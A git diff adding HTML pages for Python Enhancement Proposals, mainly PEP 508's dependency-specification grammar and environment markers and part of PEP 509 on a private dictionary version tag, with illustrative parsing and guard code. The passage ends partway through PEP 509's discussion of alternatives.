  • Where would the GitLab instance live? Physically, in whatever hosting +provider GitLab chooses. We would point gitlab.python.org (or +git.python.org?) to this host.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0507.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0508/index.html b/pep-0508/index.html new file mode 100644 index 00000000000..877ad374655 --- /dev/null +++ b/pep-0508/index.html @@ -0,0 +1,701 @@ + + + + + + + + PEP 508 – Dependency specification for Python Software Packages | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 508 – Dependency specification for Python Software Packages

+
+
Author:
+
Robert Collins <rbtcollins at hp.com>
+
BDFL-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
11-Nov-2015
+
Post-History:
+
05-Nov-2015, 16-Nov-2015
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP specifies the language used to describe dependencies for packages. +It draws a border at the edge of describing a single dependency - the +different sorts of dependencies and when they should be installed are a +higher level problem. The intent is to provide a building block for higher +layer specifications.

+

The job of a dependency is to enable tools like pip [1] to find the right +package to install. Sometimes this is very loose - just specifying a name - +and sometimes very specific - referring to a specific file to install. +Sometimes dependencies are only relevant on one platform, or only some +versions are acceptable, so the language permits describing all these +cases.

+

The language defined is a compact line-based format which is already in +widespread use in pip requirements files, though we do not specify the +command line option handling that those files permit. There is one caveat - +the URL reference form, specified in PEP 440, is not actually implemented +in pip, but since PEP 440 is accepted, we use that format rather than +pip’s current native format.

+
+
+

Motivation

+

Any specification in the Python packaging ecosystem that needs to consume +lists of dependencies needs to build on an approved PEP for such lists, but +PEP 426 is mostly aspirational - and there are already existing +implementations of the dependency specification which we can instead adopt. +The existing implementations are battle-proven and user friendly, so +adopting them is arguably much better than approving an aspirational, +unconsumed format.

+
+
+

Specification

+
+

Examples

+

All features of the language, shown with a name-based lookup:

+
requests [security,tests] >= 2.8.1, == 2.8.* ; python_version < "2.7"
+
+
+

A minimal URL-based lookup:

+
pip @ https://github.com/pypa/pip/archive/1.3.1.zip#sha1=da9234ee9982d4bbb3c72346a6de940a148ea686
+
+
+
+
+

Concepts

+

A dependency specification always specifies a distribution name. It may +include extras, which expand the dependencies of the named distribution to +enable optional features. The version installed can be controlled using +version limits, or giving the URL to a specific artifact to install. Finally +the dependency can be made conditional using environment markers.

+
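
For illustration only (the third-party packaging project implements this +specification; its API is not defined by this PEP), the components named +above can be inspected after parsing a specification:

+
from packaging.requirements import Requirement
+
+req = Requirement('requests [security] >= 2.8.1, == 2.8.* ; python_version < "2.7"')
+print(req.name)       # requests
+print(req.extras)     # {'security'}
+print(req.specifier)  # ==2.8.*,>=2.8.1 (order may vary)
+print(req.marker)     # python_version < "2.7"
+
+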
+
+

Grammar

+

We first cover the grammar briefly and then drill into the semantics of each +section later.

+

A distribution specification is written in ASCII text. We use a parsley +[2] grammar to provide a precise definition. It is expected that the +specification will be embedded into a larger system which offers framing +such as comments, multiple line support via continuations, or other such +features.

+

The full grammar including annotations to build a useful parse tree is +included at the end of the PEP.

+

Versions may be specified according to the PEP 440 rules. (Note: +URI is defined in std-66):

+
version_cmp   = wsp* '<' | '<=' | '!=' | '==' | '>=' | '>' | '~=' | '==='
+version       = wsp* ( letterOrDigit | '-' | '_' | '.' | '*' | '+' | '!' )+
+version_one   = version_cmp version wsp*
+version_many  = version_one (wsp* ',' version_one)*
+versionspec   = ( '(' version_many ')' ) | version_many
+urlspec       = '@' wsp* <URI_reference>
+
+
+

Environment markers allow making a specification only take effect in some +environments:

+
marker_op     = version_cmp | (wsp* 'in') | (wsp* 'not' wsp+ 'in')
+python_str_c  = (wsp | letter | digit | '(' | ')' | '.' | '{' | '}' |
+                 '-' | '_' | '*' | '#' | ':' | ';' | ',' | '/' | '?' |
+                 '[' | ']' | '!' | '~' | '`' | '@' | '$' | '%' | '^' |
+                 '&' | '=' | '+' | '|' | '<' | '>' )
+dquote        = '"'
+squote        = '\\''
+python_str    = (squote (python_str_c | dquote)* squote |
+                 dquote (python_str_c | squote)* dquote)
+env_var       = ('python_version' | 'python_full_version' |
+                 'os_name' | 'sys_platform' | 'platform_release' |
+                 'platform_system' | 'platform_version' |
+                 'platform_machine' | 'platform_python_implementation' |
+                 'implementation_name' | 'implementation_version' |
+                 'extra' # ONLY when defined by a containing layer
+                 )
+marker_var    = wsp* (env_var | python_str)
+marker_expr   = marker_var marker_op marker_var
+              | wsp* '(' marker wsp* ')'
+marker_and    = marker_expr wsp* 'and' marker_expr
+              | marker_expr
+marker_or     = marker_and wsp* 'or' marker_and
+                  | marker_and
+marker        = marker_or
+quoted_marker = ';' wsp* marker
+
+
+

Optional components of a distribution may be specified using the extras +field:

+
identifier_end = letterOrDigit | (('-' | '_' | '.' )* letterOrDigit)
+identifier    = letterOrDigit identifier_end*
+name          = identifier
+extras_list   = identifier (wsp* ',' wsp* identifier)*
+extras        = '[' wsp* extras_list? wsp* ']'
+
+
+

Giving us a rule for name-based requirements:

+
name_req      = name wsp* extras? wsp* versionspec? wsp* quoted_marker?
+
+
+

And a rule for direct reference specifications:

+
url_req       = name wsp* extras? wsp* urlspec wsp+ quoted_marker?
+
+
+

Leading to the unified rule that can specify a dependency:

+
specification = wsp* ( url_req | name_req ) wsp*
+
+
+
+
+

Whitespace

+

Non line-breaking whitespace is mostly optional with no semantic meaning. The +sole exception is detecting the end of a URL requirement.

+
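
For example, in the illustrative URL requirement below the space before the +';' is required: a URI may itself contain ';', so without the whitespace the +marker would be consumed as part of the URL:

+
pip @ https://example.com/pip.zip ; python_version < "3.6"
+
+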
+
+

Names

+

Python distribution names are currently defined in PEP 345. Names +act as the primary identifier for distributions. They are present in all +dependency specifications, and are sufficient to be a specification on +their own. However, PyPI places strict restrictions on names - they must +match a case-insensitive regex or they won’t be accepted. Accordingly, in +this PEP we limit the acceptable values for identifiers to that regex. A +full redefinition of name may take place in a future metadata PEP. The +regex (run with re.IGNORECASE) is:

+
^([A-Z0-9]|[A-Z0-9][A-Z0-9._-]*[A-Z0-9])$
+
+
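
A minimal sketch of applying this regex (illustrative only, not part of the +specification):

+
import re
+
+NAME_RE = re.compile(r"^([A-Z0-9]|[A-Z0-9][A-Z0-9._-]*[A-Z0-9])$", re.IGNORECASE)
+
+assert NAME_RE.match("requests")
+assert NAME_RE.match("A.B-C_D")
+assert not NAME_RE.match("-leading-dash")
+
+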
+
+
+

Extras

+

An extra is an optional part of a distribution. Distributions can specify as +many extras as they wish, and each extra results in the declaration of +additional dependencies of the distribution when the extra is used in a +dependency specification. For instance:

+
requests[security]
+
+
+

Extras union in the dependencies they define with the dependencies of the +distribution they are attached to. The example above would result in +requests being installed, along with requests’ own dependencies, and also +any dependencies that are listed in the “security” extra of requests.

+

If multiple extras are listed, all the dependencies are unioned together.

+
+
+

Versions

+

See PEP 440 for more detail on both version numbers and version +comparisons. Version specifications limit the versions of a distribution +that can be used. They only apply to distributions looked up by name, +rather than via a URL. Version comparisons are also used in the markers +feature. The optional brackets around a version are present for +compatibility with PEP 345 but should not be generated, only accepted.

+
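
As an illustration (again using the third-party packaging project, which is +not part of this PEP), a version specification can be applied to candidate +versions:

+
from packaging.specifiers import SpecifierSet
+
+spec = SpecifierSet(">=2.8.1,==2.8.*")
+print("2.8.3" in spec)  # True
+print("2.9.0" in spec)  # False: excluded by ==2.8.*
+
+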
+
+

Environment Markers

+

Environment markers allow a dependency specification to provide a rule +that describes when the dependency should be used. For instance, consider +a package that needs argparse. In Python 2.7 argparse is always present. +On older Python versions it has to be installed as a dependency. This can +be expressed as follows:

+
argparse;python_version<"2.7"
+
+
+

A marker expression evaluates to either True or False. When it evaluates to +False, the dependency specification should be ignored.

+
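
For illustration only, the third-party packaging project evaluates markers +against the current environment (or an explicitly supplied one):

+
from packaging.markers import Marker
+
+marker = Marker('python_version < "2.7"')
+print(marker.evaluate())  # False on any Python 3 interpreter
+print(marker.evaluate({"python_version": "2.6"}))  # True
+
+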

The marker language is inspired by Python itself, chosen for the ability to +safely evaluate it without running arbitrary code that could become a security +vulnerability. Markers were first standardised in PEP 345. This PEP +fixes some issues that were observed in the design described in PEP 426.

+

Comparisons in marker expressions are typed by the comparison operator. The +<marker_op> operators that are not in <version_cmp> perform the same as they +do for strings in Python. The <version_cmp> operators use the PEP 440 +version comparison rules when those are defined (that is when both +sides have a valid version specifier). If there is no defined PEP 440 +behaviour and the operator exists in Python, then the operator falls back to +the Python behaviour. Otherwise an error should be raised. e.g. the following +will result in errors:

+
"dog" ~= "fred"
+python_version ~= "surprise"
+
+
+

User supplied constants are always encoded as strings with either ' or +" quote marks. Note that backslash escapes are not defined, but existing +implementations do support them. They are not included in this +specification because they add complexity and there is no observable need for +them today. Similarly we do not define non-ASCII character support: all the +runtime variables we are referencing are expected to be ASCII-only.

+

The variables in the marker grammar such as “os_name” resolve to values looked +up in the Python runtime. With the exception of “extra” all values are defined +on all Python versions today - it is an error in the implementation of markers +if a value is not defined.

+

Unknown variables must raise an error rather than resulting in a comparison +that evaluates to True or False.

+

Variables whose value cannot be calculated on a given Python implementation +should evaluate to 0 for versions, and an empty string for all other +variables.

+

The “extra” variable is special. It is used by wheels to signal which +specifications apply to a given extra in the wheel METADATA file, but +since the METADATA file is based on a draft version of PEP 426, there is +no current specification for this. Regardless, outside of a context where this +special handling is taking place, the “extra” variable should result in an +error like all other unknown variables.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Marker | Python equivalent | Sample values
os_name | os.name | posix, java
sys_platform | sys.platform | linux, linux2, darwin, java1.8.0_51 (note that “linux” is from Python3 and “linux2” from Python2)
platform_machine | platform.machine() | x86_64
platform_python_implementation | platform.python_implementation() | CPython, Jython
platform_release | platform.release() | 3.14.1-x86_64-linode39, 14.5.0, 1.8.0_51
platform_system | platform.system() | Linux, Windows, Java
platform_version | platform.version() | #1 SMP Fri Apr 25 13:07:35 EDT 2014; Java HotSpot(TM) 64-Bit Server VM, 25.51-b03, Oracle Corporation; Darwin Kernel Version 14.5.0: Wed Jul 29 02:18:53 PDT 2015; root:xnu-2782.40.9~2/RELEASE_X86_64
python_version | '.'.join(platform.python_version_tuple()[:2]) | 3.4, 2.7
python_full_version | platform.python_version() | 3.4.0, 3.5.0b1
implementation_name | sys.implementation.name | cpython
implementation_version | see definition below | 3.4.0, 3.5.0b1
extra | An error except when defined by the context interpreting the specification. | test
+

The implementation_version marker variable is derived from +sys.implementation.version:

+
import sys
+
+def format_full_version(info):
+    version = '{0.major}.{0.minor}.{0.micro}'.format(info)
+    kind = info.releaselevel
+    if kind != 'final':
+        version += kind[0] + str(info.serial)
+    return version
+
+if hasattr(sys, 'implementation'):
+    implementation_version = format_full_version(sys.implementation.version)
+else:
+    implementation_version = "0"
+
+
+
+
+
+

Backwards Compatibility

+

Most of this PEP is already widely deployed and thus offers no compatibility +concerns.

+

There are however a few points where the PEP differs from the deployed base.

+

Firstly, PEP 440 direct references haven’t actually been deployed in the wild, +but they were designed to be compatibly added, and there are no known +obstacles to adding them to pip or other tools that consume the existing +dependency metadata in distributions - particularly since they won’t be +permitted to be present in PyPI uploaded distributions anyway.

+

Secondly, PEP 426 markers which have had some reasonable deployment, +particularly in wheels and pip, will handle version comparisons with +python_full_version “2.7.10” differently. Specifically in 426 “2.7.10” is +less than “2.7.9”. This backward incompatibility is deliberate. We are also +defining new operators - “~=” and “===”, and new variables - +platform_release, platform_system, implementation_name, and +implementation_version which are not present in older marker +implementations. The variables will error on those implementations. Users of +both features will need to make a judgement as to when support has become +sufficiently widespread in the ecosystem that using them will not cause +compatibility issues.

+

Thirdly, PEP 345 required brackets around version specifiers. In order to +accept PEP 345 dependency specifications, brackets are accepted, but they +should not be generated.

+
+
+

Rationale

+

In order to move forward with any new PEPs that depend on environment markers, +we needed a specification that included them in their modern form. This PEP +brings together all the currently unspecified components into a specified +form.

+

The requirement specifier was adopted from the EBNF in the setuptools +pkg_resources documentation, since we wish to avoid depending on a de +facto, rather than PEP-specified, standard.

+
+
+

Complete Grammar

+

The complete parsley grammar:

+
wsp           = ' ' | '\t'
+version_cmp   = wsp* <'<=' | '<' | '!=' | '==' | '>=' | '>' | '~=' | '==='>
+version       = wsp* <( letterOrDigit | '-' | '_' | '.' | '*' | '+' | '!' )+>
+version_one   = version_cmp:op version:v wsp* -> (op, v)
+version_many  = version_one:v1 (wsp* ',' version_one)*:v2 -> [v1] + v2
+versionspec   = ('(' version_many:v ')' ->v) | version_many
+urlspec       = '@' wsp* <URI_reference>
+marker_op     = version_cmp | (wsp* 'in') | (wsp* 'not' wsp+ 'in')
+python_str_c  = (wsp | letter | digit | '(' | ')' | '.' | '{' | '}' |
+                 '-' | '_' | '*' | '#' | ':' | ';' | ',' | '/' | '?' |
+                 '[' | ']' | '!' | '~' | '`' | '@' | '$' | '%' | '^' |
+                 '&' | '=' | '+' | '|' | '<' | '>' )
+dquote        = '"'
+squote        = '\\''
+python_str    = (squote <(python_str_c | dquote)*>:s squote |
+                 dquote <(python_str_c | squote)*>:s dquote) -> s
+env_var       = ('python_version' | 'python_full_version' |
+                 'os_name' | 'sys_platform' | 'platform_release' |
+                 'platform_system' | 'platform_version' |
+                 'platform_machine' | 'platform_python_implementation' |
+                 'implementation_name' | 'implementation_version' |
+                 'extra' # ONLY when defined by a containing layer
+                 ):varname -> lookup(varname)
+marker_var    = wsp* (env_var | python_str)
+marker_expr   = marker_var:l marker_op:o marker_var:r -> (o, l, r)
+              | wsp* '(' marker:m wsp* ')' -> m
+marker_and    = marker_expr:l wsp* 'and' marker_expr:r -> ('and', l, r)
+              | marker_expr:m -> m
+marker_or     = marker_and:l wsp* 'or' marker_and:r -> ('or', l, r)
+                  | marker_and:m -> m
+marker        = marker_or
+quoted_marker = ';' wsp* marker
+identifier_end = letterOrDigit | (('-' | '_' | '.' )* letterOrDigit)
+identifier    = < letterOrDigit identifier_end* >
+name          = identifier
+extras_list   = identifier:i (wsp* ',' wsp* identifier)*:ids -> [i] + ids
+extras        = '[' wsp* extras_list?:e wsp* ']' -> e
+name_req      = (name:n wsp* extras?:e wsp* versionspec?:v wsp* quoted_marker?:m
+                 -> (n, e or [], v or [], m))
+url_req       = (name:n wsp* extras?:e wsp* urlspec:v (wsp+ | end) quoted_marker?:m
+                 -> (n, e or [], v, m))
+specification = wsp* ( url_req | name_req ):s wsp* -> s
+# The result is a tuple - name, list-of-extras,
+# list-of-version-constraints-or-a-url, marker-ast or None
+
+
+URI_reference = <URI | relative_ref>
+URI           = scheme ':' hier_part ('?' query )? ( '#' fragment)?
+hier_part     = ('//' authority path_abempty) | path_absolute | path_rootless | path_empty
+absolute_URI  = scheme ':' hier_part ( '?' query )?
+relative_ref  = relative_part ( '?' query )? ( '#' fragment )?
+relative_part = '//' authority path_abempty | path_absolute | path_noscheme | path_empty
+scheme        = letter ( letter | digit | '+' | '-' | '.')*
+authority     = ( userinfo '@' )? host ( ':' port )?
+userinfo      = ( unreserved | pct_encoded | sub_delims | ':')*
+host          = IP_literal | IPv4address | reg_name
+port          = digit*
+IP_literal    = '[' ( IPv6address | IPvFuture) ']'
+IPvFuture     = 'v' hexdig+ '.' ( unreserved | sub_delims | ':')+
+IPv6address   = (
+                  ( h16 ':'){6} ls32
+                  | '::' ( h16 ':'){5} ls32
+                  | ( h16 )?  '::' ( h16 ':'){4} ls32
+                  | ( ( h16 ':')? h16 )? '::' ( h16 ':'){3} ls32
+                  | ( ( h16 ':'){0,2} h16 )? '::' ( h16 ':'){2} ls32
+                  | ( ( h16 ':'){0,3} h16 )? '::' h16 ':' ls32
+                  | ( ( h16 ':'){0,4} h16 )? '::' ls32
+                  | ( ( h16 ':'){0,5} h16 )? '::' h16
+                  | ( ( h16 ':'){0,6} h16 )? '::' )
+h16           = hexdig{1,4}
+ls32          = ( h16 ':' h16) | IPv4address
+IPv4address   = dec_octet '.' dec_octet '.' dec_octet '.' dec_octet
+nz            = ~'0' digit
+dec_octet     = (
+                  digit # 0-9
+                  | nz digit # 10-99
+                  | '1' digit{2} # 100-199
+                  | '2' ('0' | '1' | '2' | '3' | '4') digit # 200-249
+                  | '25' ('0' | '1' | '2' | '3' | '4' | '5') )# %250-255
+reg_name = ( unreserved | pct_encoded | sub_delims)*
+path = (
+        path_abempty # begins with '/' or is empty
+        | path_absolute # begins with '/' but not '//'
+        | path_noscheme # begins with a non-colon segment
+        | path_rootless # begins with a segment
+        | path_empty ) # zero characters
+path_abempty  = ( '/' segment)*
+path_absolute = '/' ( segment_nz ( '/' segment)* )?
+path_noscheme = segment_nz_nc ( '/' segment)*
+path_rootless = segment_nz ( '/' segment)*
+path_empty    = pchar{0}
+segment       = pchar*
+segment_nz    = pchar+
+segment_nz_nc = ( unreserved | pct_encoded | sub_delims | '@')+
+                # non-zero-length segment without any colon ':'
+pchar         = unreserved | pct_encoded | sub_delims | ':' | '@'
+query         = ( pchar | '/' | '?')*
+fragment      = ( pchar | '/' | '?')*
+pct_encoded   = '%' hexdig
+unreserved    = letter | digit | '-' | '.' | '_' | '~'
+reserved      = gen_delims | sub_delims
+gen_delims    = ':' | '/' | '?' | '#' | '(' | ')?' | '@'
+sub_delims    = '!' | '$' | '&' | '\\'' | '(' | ')' | '*' | '+' | ',' | ';' | '='
+hexdig        = digit | 'a' | 'A' | 'b' | 'B' | 'c' | 'C' | 'd' | 'D' | 'e' | 'E' | 'f' | 'F'
+
+
+

A test program - assuming the grammar is stored in a string grammar:

+
import os
+import sys
+import platform
+
+from parsley import makeGrammar
+
+grammar = """
+    wsp ...
+    """
+tests = [
+    "A",
+    "A.B-C_D",
+    "aa",
+    "name",
+    "name<=1",
+    "name>=3",
+    "name>=3,<2",
+    "name@http://foo.com",
+    "name [fred,bar] @ http://foo.com ; python_version=='2.7'",
+    "name[quux, strange];python_version<'2.7' and platform_version=='2'",
+    "name; os_name=='a' or os_name=='b'",
+    # Should parse as (a and b) or c
+    "name; os_name=='a' and os_name=='b' or os_name=='c'",
+    # Overriding precedence -> a and (b or c)
+    "name; os_name=='a' and (os_name=='b' or os_name=='c')",
+    # should parse as a or (b and c)
+    "name; os_name=='a' or os_name=='b' and os_name=='c'",
+    # Overriding precedence -> (a or b) and c
+    "name; (os_name=='a' or os_name=='b') and os_name=='c'",
+    ]
+
+def format_full_version(info):
+    version = '{0.major}.{0.minor}.{0.micro}'.format(info)
+    kind = info.releaselevel
+    if kind != 'final':
+        version += kind[0] + str(info.serial)
+    return version
+
+if hasattr(sys, 'implementation'):
+    implementation_version = format_full_version(sys.implementation.version)
+    implementation_name = sys.implementation.name
+else:
+    implementation_version = '0'
+    implementation_name = ''
+bindings = {
+    'implementation_name': implementation_name,
+    'implementation_version': implementation_version,
+    'os_name': os.name,
+    'platform_machine': platform.machine(),
+    'platform_python_implementation': platform.python_implementation(),
+    'platform_release': platform.release(),
+    'platform_system': platform.system(),
+    'platform_version': platform.version(),
+    'python_full_version': platform.python_version(),
+    'python_version': '.'.join(platform.python_version_tuple()[:2]),
+    'sys_platform': sys.platform,
+}
+
+compiled = makeGrammar(grammar, {'lookup': bindings.__getitem__})
+for test in tests:
+    parsed = compiled(test).specification()
+    print("%s -> %s" % (test, parsed))
+
+
+
+
+

Summary of changes to PEP 508

+

The following changes were made to this PEP based on feedback after its initial +implementation:

+
    +
  • The definition of python_version was changed from +platform.python_version()[:3] to +'.'.join(platform.python_version_tuple()[:2]), to accommodate potential +future versions of Python with 2-digit major and minor versions +(e.g. 3.10). [3]
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0508.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0509/index.html b/pep-0509/index.html new file mode 100644 index 00000000000..657257f1b84 --- /dev/null +++ b/pep-0509/index.html @@ -0,0 +1,657 @@ + + + + + + + + PEP 509 – Add a private version to dict | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 509 – Add a private version to dict

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
04-Jan-2016
+
Python-Version:
+
3.6
+
Post-History:
+
08-Jan-2016, +11-Jan-2016, +14-Apr-2016, +19-Apr-2016
+
Superseded-By:
+
699
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Add a new private version to the builtin dict type, incremented at +each dictionary creation and at each dictionary change, to implement +fast guards on namespaces.

+
+
+

Rationale

+

In Python, the builtin dict type is used by many instructions. For +example, the LOAD_GLOBAL instruction looks up a variable in the +global namespace, or in the builtins namespace (two dict lookups). +Python uses dict for the builtins namespace, globals namespace, type +namespaces, instance namespaces, etc. The local namespace (function +namespace) is usually optimized to an array, but it can be a dict too.

+

Python is hard to optimize because almost everything is mutable: builtin +functions, function code, global variables, local variables, … can be +modified at runtime. Implementing optimizations respecting the Python +semantics requires detecting when “something changes”: we will call these +checks “guards”.

+

The speedup of optimizations depends on the speed of guard checks. This +PEP proposes to add a private version to dictionaries to implement fast +guards on namespaces.

+

Dictionary lookups can be skipped if the version does not change, which +is the common case for most namespaces. The version is globally unique, +so checking the version is also enough to verify that the namespace +dictionary was not replaced with a new dictionary.

+

When the dictionary version does not change, the performance of a guard +does not depend on the number of watched dictionary entries: the +complexity is O(1).

+

Example of optimization: copy the value of a global variable to function +constants. This optimization requires a guard on the global variable to +check if it was modified after it was copied. If the global variable is +not modified, the function uses the cached copy. If the global variable is +modified, the function uses a regular lookup, and maybe also deoptimizes +itself (to remove the overhead of the guard check for subsequent function +calls).

+

See PEP 510 – Specialize functions with guards +for concrete usage of +guards to specialize functions and for a more general rationale on +Python static optimizers.

+
+
+

Guard example

+

Pseudo-code of a fast guard to check if a dictionary entry was modified +(created, updated or deleted) using a hypothetical +dict_get_version(dict) function:

+
UNSET = object()
+
+class GuardDictKey:
+    def __init__(self, dict, key):
+        self.dict = dict
+        self.key = key
+        self.value = dict.get(key, UNSET)
+        self.version = dict_get_version(dict)
+
+    def check(self):
+        """Return True if the dictionary entry did not change
+        and the dictionary was not replaced."""
+
+        # read the version of the dictionary
+        version = dict_get_version(self.dict)
+        if version == self.version:
+            # Fast-path: dictionary lookup avoided
+            return True
+
+        # lookup in the dictionary
+        value = self.dict.get(self.key, UNSET)
+        if value is self.value:
+            # another key was modified:
+            # cache the new dictionary version
+            self.version = version
+            return True
+
+        # the key was modified
+        return False
+
+
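
Since dict_get_version() is hypothetical, the guard above cannot run as-is. +A toy simulation of the proposed semantics, building on the GuardDictKey +class above and using a dict subclass that maintains its own version tag +(illustration only: it ignores methods like update() or pop()):

+
_global_version = 0
+
+class VersionedDict(dict):
+    """Toy stand-in for the proposed ma_version_tag semantics."""
+    def __init__(self, *args, **kwargs):
+        super().__init__(*args, **kwargs)
+        self._bump()
+
+    def _bump(self):
+        # mimic the globally unique, always increasing version
+        global _global_version
+        _global_version += 1
+        self._version = _global_version
+
+    def __setitem__(self, key, value):
+        super().__setitem__(key, value)
+        self._bump()
+
+    def __delitem__(self, key):
+        super().__delitem__(key)
+        self._bump()
+
+def dict_get_version(d):
+    return d._version
+
+ns = VersionedDict(len=len)
+guard = GuardDictKey(ns, "len")
+assert guard.check()       # version unchanged: fast path
+ns["other"] = 1
+assert guard.check()       # another key changed: version re-cached
+ns["len"] = None
+assert not guard.check()   # the watched entry changed
+
+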
+
+
+

Usage of the dict version

+
+

Speedup method calls

+

Yury Selivanov wrote a patch to optimize method calls. The patch depends on the +“implement per-opcode cache in ceval” patch which requires dictionary +versions to invalidate the cache if the globals dictionary or the +builtins dictionary has been modified.

+

The cache also requires that the dictionary version is globally unique. +It is possible to define a function in a namespace and call it in a +different namespace, using exec() with the globals parameter for +example. In this case, the globals dictionary was replaced and the cache +must also be invalidated.

+
+
+

Specialized functions using guards

+

PEP 510 proposes an API to support +specialized functions with guards. It makes it possible to implement +static optimizers for Python without breaking the Python semantics.

+

The fatoptimizer of the FAT +Python project +is an example of a static Python optimizer. It implements many +optimizations which require guards on namespaces:

+
    +
  • Call pure builtins: to replace len("abc") with 3, guards on +builtins.__dict__['len'] and globals()['len'] are required
  • +
  • Loop unrolling: to unroll the loop for i in range(...): ..., +guards on builtins.__dict__['range'] and globals()['range'] +are required
  • +
  • etc.
  • +
+
+
+

Pyjion

+

According to Brett Cannon, one of the two main developers of Pyjion, +Pyjion can benefit from the dictionary version to implement optimizations.

+

Pyjion is a JIT compiler for +Python based upon CoreCLR (Microsoft .NET Core runtime).

+
+
+

Cython

+

Cython can benefit from the dictionary version to implement optimizations.

+

Cython is an optimising static compiler for both +the Python programming language and the extended Cython programming +language.

+
+
+

Unladen Swallow

+

Even if dictionary version was not explicitly mentioned, optimizing +globals and builtins lookup was part of the Unladen Swallow plan: +“Implement one of the several proposed schemes for speeding lookups of +globals and builtins.” (source: Unladen Swallow ProjectPlan).

+

Unladen Swallow is a fork of CPython 2.6.1 adding a JIT compiler +implemented with LLVM. The project stopped in 2011: Unladen Swallow +Retrospective.

+
+
+
+

Changes

+

Add a ma_version_tag field to the PyDictObject structure with +the C type PY_UINT64_T, a 64-bit unsigned integer. Also add a global +dictionary version.

+

Each time a dictionary is created, the global version is incremented and +the dictionary version is initialized to the global version.

+

Each time the dictionary content is modified, the global version must be +incremented and copied to the dictionary version. Dictionary methods which +can modify the content:

+
    +
  • clear()
  • +
  • pop(key)
  • +
  • popitem()
  • +
  • setdefault(key, value)
  • +
  • __delitem__(key)
  • +
  • __setitem__(key, value)
  • +
  • update(...)
  • +
+

Whether or not to increase the version when a dictionary method does not +change its content is left to the Python implementation. A Python +implementation can decide to not increase the version to avoid dictionary +lookups in guards. Examples of cases when dictionary methods don’t modify +the content:

+
    +
  • clear() if the dict is already empty
  • +
  • pop(key) if the key does not exist
  • +
  • popitem() if the dict is empty
  • +
  • setdefault(key, value) if the key already exists
  • +
  • __delitem__(key) if the key does not exist
  • +
  • __setitem__(key, value) if the new value is identical to the +current value
  • +
  • update() if called without argument or if new values are identical +to current values
  • +
+

Setting a key to a new value equal to the old value is also considered an +operation modifying the dictionary content.

+

Two different empty dictionaries must have different versions, to be able +to identify a dictionary just by its version. This allows a guard to +verify that a namespace was not replaced without storing a strong +reference to the dictionary. Using a borrowed reference does not work: if +the old dictionary is destroyed, it is possible that a new dictionary is +allocated at the same memory address. Moreover, dictionaries don’t support +weak references.

+

The version increase must be atomic. In CPython, the Global Interpreter +Lock (GIL) already protects dict methods, making changes atomic.

+

Example using a hypothetical dict_get_version(dict) function:

+
>>> d = {}
+>>> dict_get_version(d)
+100
+>>> d['key'] = 'value'
+>>> dict_get_version(d)
+101
+>>> d['key'] = 'new value'
+>>> dict_get_version(d)
+102
+>>> del d['key']
+>>> dict_get_version(d)
+103
+
+
+

The field is called ma_version_tag, rather than ma_version, to +suggest to compare it using version_tag == old_version_tag, rather +than version <= old_version which becomes wrong after an integer +overflow.

+
+
+

Backwards Compatibility

+

Since the PyDictObject structure is not part of the stable ABI and +the new dictionary version is not exposed at the Python level, the changes +are backward compatible.

+
+
+

Implementation and Performance

+

The issue #26058: PEP 509: Add ma_version_tag to PyDictObject contains a patch implementing +this PEP.

+

On pybench and timeit microbenchmarks, the patch does not seem to add +any overhead on dictionary operations. For example, the following timeit +micro-benchmark takes 318 nanoseconds before and after the change:

+
python3.6 -m timeit 'd={1: 0}; d[2]=0; d[3]=0; d[4]=0; del d[1]; del d[2]; d.clear()'
+
+
+

When the version does not change, PyDict_GetItem() takes 14.8 ns for +a dictionary lookup, whereas a guard check only takes 3.8 ns. Moreover, +a guard can watch for multiple keys. For example, for an optimization +using 10 global variables in a function, 10 dictionary lookups costs 148 +ns, whereas the guard still only costs 3.8 ns when the version does not +change (39x as fast).

+

The fat module implements +such guards: fat.GuardDict is based on the dictionary version.

+
+
+

Integer overflow

+

The implementation uses the C type PY_UINT64_T to store the version: +a 64-bit unsigned integer. The C code uses version++. On integer +overflow, the version is wrapped to 0 (and then continues to be +incremented) according to the C standard.

+

After an integer overflow, a guard can succeed whereas the watched +dictionary key was modified. The bug only occurs at a guard check if +there are exactly 2 ** 64 dictionary creations or modifications +since the previous guard check.

+

If a dictionary is modified every nanosecond, 2 ** 64 modifications +take longer than 584 years. Using a 32-bit version, it would only take 4 +seconds. That’s why a 64-bit unsigned type is also used on 32-bit +systems. A dictionary lookup at the C level takes 14.8 ns.

+

A risk of a bug every 584 years is acceptable.

+
+
+

Alternatives

+
+

Expose the version at Python level as a read-only __version__ property

+

The first version of the PEP proposed to expose the dictionary version +as a read-only __version__ property at Python level, and also to add +the property to collections.UserDict (since this type must mimic +the dict API).

+

There are multiple issues:

+
    +
  • To be consistent and avoid bad surprises, the version must be added to +all mapping types. Implementing a new mapping type would require extra +work for no benefit, since the version is only required on the +dict type in practice.
  • +
  • All Python implementations would have to implement this new property; +it creates more work for other implementations, even though they may not +use the dictionary version at all.
  • +
  • Exposing the dictionary version at the Python level can lead to false +assumptions about performance. Checking dict.__version__ at +the Python level is not faster than a dictionary lookup. A dictionary +lookup in Python has a cost of 48.7 ns and checking the version has a +cost of 47.5 ns, a difference of only 1.2 ns (3%):
